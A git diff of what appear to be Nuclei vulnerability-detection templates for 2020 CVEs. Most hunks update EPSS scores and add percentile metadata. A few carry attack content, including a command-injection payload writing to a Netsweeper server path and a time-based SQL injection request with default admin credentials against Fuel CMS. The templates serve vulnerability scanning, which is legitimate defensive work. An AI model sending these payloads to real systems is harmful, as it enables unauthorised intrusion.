a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12800 cwe-id: CWE-434 - epss-score: 0.97425 + epss-score: 0.97435 cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99908 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 250edae1a3..cbd62ae274 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-77 epss-score: 0.0785 cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.93385 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 261b04a3b9..444d6195b6 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.00235 cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* + epss-percentile: 0.60968 metadata: max-request: 1 vendor: rcos diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index c34de78a73..24262b1a45 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13158 cwe-id: CWE-22 - epss-score: 0.96888 + epss-score: 0.96791 cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* + epss-percentile: 0.99534 metadata: max-request: 1 vendor: articatech diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 5f7f3e16fa..06abde52d8 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -17,12 +17,12 @@ info: cwe-id: CWE-78 epss-score: 0.97384 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.99866 metadata: max-request: 2 vendor: netsweeper product: netsweeper tags: cve,cve2020,netsweeper,rce,python,webadmin - variables: rand_str: "{{randstr}}" cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out' diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 45e88efa3c..6b9ed09cb1 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00464 cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* + epss-percentile: 0.72315 metadata: max-request: 1 vendor: contentful diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index ffe2cb9506..dec5fa1886 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -18,8 +18,9 @@ info: cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.16322 + epss-score: 0.21406 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.95791 metadata: max-request: 1 shodan-query: title:"Grafana" diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 32f0657567..6bc2cd114b 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-306 epss-score: 0.00667 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.77128 metadata: max-request: 3 shodan-query: http.html:"microweber" diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 54ba3e4f7b..50690fa1dc 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00113 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* + epss-percentile: 0.44064 metadata: max-request: 2 vendor: bitrix24 diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index d02cf5687c..2ec9691af0 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13700 cwe-id: CWE-639 - epss-score: 0.01364 + epss-score: 0.01923 cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87118 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 081d0f3d3b..32ff5451ff 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00237 cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* + epss-percentile: 0.6108 metadata: max-request: 1 shodan-query: title:"Extreme Management Center" diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 136990219f..4ad258414a 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13927 cwe-id: CWE-1188 - epss-score: 0.94321 + epss-score: 0.95404 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + epss-percentile: 0.99097 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 6eeb92c490..7b3c1bf379 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-922 epss-score: 0.97402 cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99877 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 052505f23a..3761cc2185 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -23,12 +23,12 @@ info: cwe-id: CWE-74,CWE-20 epss-score: 0.97533 cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* + epss-percentile: 0.99986 metadata: max-request: 1 vendor: apache product: unomi tags: cve,cve2020,apache,rce - variables: id: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index c9eb69b7e8..9cbbacbb20 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 - epss-score: 0.00598 + epss-score: 0.00522 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* + epss-percentile: 0.73906 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index f4bdee3db1..2ca346afea 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.76739 cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97784 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 5c73904b6c..ff855d73a3 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 - epss-score: 0.96792 + epss-score: 0.96765 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* + epss-percentile: 0.99519 metadata: max-request: 7 shodan-query: html:"Powered by Gitea Version" diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index defae285c5..ea377200f2 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -14,6 +14,7 @@ info: cve-id: CVE-2020-14179 epss-score: 0.0047 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.72498 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 84082ee55e..994e9f016d 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.971 + epss-score: 0.96932 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.99604 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 0da876ebbf..a040285363 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00113 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* + epss-percentile: 0.44064 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index fe2b26bf64..4a0571c133 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00095 cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* + epss-percentile: 0.39345 metadata: max-request: 1 vendor: nedi diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 4fe69b2713..067de8e53c 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - epss-score: 0.97528 + epss-score: 0.97553 cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* + epss-percentile: 0.99993 metadata: max-request: 1 shodan-query: http.html:"Weblogic Application Server" diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 935d3ff093..3b14004ff6 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-14864 cwe-id: CWE-22 - epss-score: 0.30306 + epss-score: 0.32452 cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* + epss-percentile: 0.96445 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 984102de19..7f2865a76a 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14882 - epss-score: 0.97544 + epss-score: 0.97537 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99988 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 5b7c8156b8..8dddb0254a 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14883 - epss-score: 0.97528 + epss-score: 0.97537 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99989 metadata: max-request: 1 verified: true diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index b43b8e7c11..7b7278d9de 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-15050 cwe-id: CWE-22 - epss-score: 0.14193 + epss-score: 0.13878 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* + epss-percentile: 0.94934 metadata: max-request: 1 vendor: supremainc diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 4a2318f583..5ad478bc16 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.00519 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* + epss-percentile: 0.73814 metadata: max-request: 1 vendor: traefik diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 662423edcb..dd228c254b 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -16,8 +16,9 @@ info: cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 - epss-score: 0.01814 + epss-score: 0.02226 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* + epss-percentile: 0.88079 metadata: max-request: 1 vendor: yiiframework diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index a07bef6112..576108a873 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15227 cwe-id: CWE-94,CWE-74 - epss-score: 0.9741 + epss-score: 0.97364 cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* + epss-percentile: 0.99844 metadata: max-request: 1 vendor: nette diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index c719b21439..383d2812b3 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0021 cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* + epss-percentile: 0.58204 metadata: max-request: 1 vendor: tileserver diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 2865bc404e..cbe78c71d5 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -22,6 +22,7 @@ info: cwe-id: CWE-706 epss-score: 0.97504 cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* + epss-percentile: 0.99964 metadata: max-request: 1 vendor: mobileiron diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 345329b65a..4179598619 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -16,12 +16,12 @@ info: cwe-id: CWE-913 epss-score: 0.96537 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* + epss-percentile: 0.99422 metadata: max-request: 2 vendor: terra-master product: tos tags: cve,cve2020,terramaster,rce - variables: filename: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 1c0e2c2499..7c7a15a98b 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 - epss-score: 0.96555 + epss-score: 0.96465 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* + epss-percentile: 0.99385 metadata: max-request: 7 verified: true diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index c412810275..31e66e2548 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00187 cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:* + epss-percentile: 0.55288 metadata: max-request: 1 shodan-query: html:"DIR-816L" diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index 59abbb89ec..853730a203 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15920 cwe-id: CWE-78 - epss-score: 0.97241 + epss-score: 0.97263 cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:* + epss-percentile: 0.9977 metadata: max-request: 1 vendor: midasolutions diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index 8f3c8cfc12..7465dea796 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2020-16139 epss-score: 0.01181 cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.83291 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index 05c16351cc..85411d171f 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -17,14 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-16846 cwe-id: CWE-78 - epss-score: 0.97541 + epss-score: 0.97514 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* + epss-percentile: 0.99971 metadata: max-request: 1 vendor: saltstack product: salt tags: vulhub,cve,cve2020,saltstack,kev - variables: priv: "{{to_lower(rand_text_alpha(5))}}" roaster: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 3d0e4fc201..6e6a57db01 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.8 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.16299 + epss-score: 0.19008 cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* + epss-percentile: 0.95588 metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 563e80c21c..c4b22882a0 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00101 cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40822 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index c09328ccfc..76b8c3e30f 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.01736 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.86329 metadata: max-request: 1 vendor: wso2 diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 7d0f42657b..b81850f0a4 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-78 epss-score: 0.97265 cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99771 metadata: max-request: 2 vendor: seowonintech diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index f74e18f64c..117d5b9929 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -3,33 +3,37 @@ id: CVE-2020-17463 info: name: Fuel CMS 1.4.7 - SQL Injection author: Thirukrishnan - severity: high + severity: critical description: | FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items. - remediation: Fixed in version 115 reference: - https://www.exploit-db.com/exploits/48741 - https://nvd.nist.gov/vuln/detail/CVE-2020-17463 - http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html - https://getfuelcms.com/ + - https://cwe.mitre.org/data/definitions/89.html + remediation: Fixed in version 115 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-17463 cwe-id: CWE-89 + epss-score: 0.8963 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* + epss-percentile: 0.98341 metadata: max-request: 3 verified: true shodan-query: http.title:"fuel cms" - tags: cve,cve2020,sqli,fuel-cms,kev + vendor: thedaylightstudio + product: fuel_cms + tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev http: - raw: - | GET /fuel/login/ HTTP/1.1 Host: {{Hostname}} - - | POST /fuel/login/ HTTP/1.1 Host: {{Hostname}} @@ -37,7 +41,6 @@ http: Referer: {{RootURL}} user_name={{username}}&password={{password}}&Login=Login&forward= - - | @timeout: 10s GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1 @@ -51,7 +54,6 @@ http: password: - admin attack: pitchfork - cookie-reuse: true matchers: - type: dsl diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 85f29f017d..37cdb8796d 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 - epss-score: 0.97513 + epss-score: 0.97475 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + epss-percentile: 0.99945 metadata: max-request: 1 vendor: vbulletin diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 0fc619a4d1..4ece0aeb70 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-78 epss-score: 0.96863 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* + epss-percentile: 0.99563 metadata: max-request: 2 vendor: articatech diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 67aa99a35b..597e9d806e 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17506 cwe-id: CWE-89 - epss-score: 0.96186 + epss-score: 0.96091 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* + epss-percentile: 0.9927 metadata: max-request: 1 vendor: articatech diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 1e802257f5..12c36cbfeb 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17518 cwe-id: CWE-22,CWE-23 - epss-score: 0.97469 + epss-score: 0.97465 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* + epss-percentile: 0.99936 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 1fd45c10fb..00c456afc2 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17519 cwe-id: CWE-552 - epss-score: 0.97434 + epss-score: 0.97432 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* + epss-percentile: 0.99903 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 83271c2100..be2b4d597d 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 - epss-score: 0.03799 + epss-score: 0.03274 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + epss-percentile: 0.90012 metadata: max-request: 2 fofa-query: Apache Airflow diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 537683e9c5..b9e9a53fbc 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - epss-score: 0.971 + epss-score: 0.97161 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* + epss-percentile: 0.99704 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index d1d10e58fb..a9295432b9 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00138 cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* + epss-percentile: 0.48623 metadata: max-request: 2 vendor: zblogcn diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index d80fd6e69d..f2d29583ee 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* + epss-percentile: 0.47974 metadata: max-request: 1 vendor: jeesns diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index a0918ee82b..fc9e139808 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* + epss-percentile: 0.47974 metadata: max-request: 1 vendor: jeesns diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 94688af0fb..5b38c8c898 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00116 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* + epss-percentile: 0.44609 metadata: max-request: 1 fofa-query: title="Jeesns" @@ -45,4 +46,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index ea54afe274..ee45e0af97 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2020-19360 cwe-id: CWE-22 - epss-score: 0.08443 + epss-score: 0.08829 cpe: 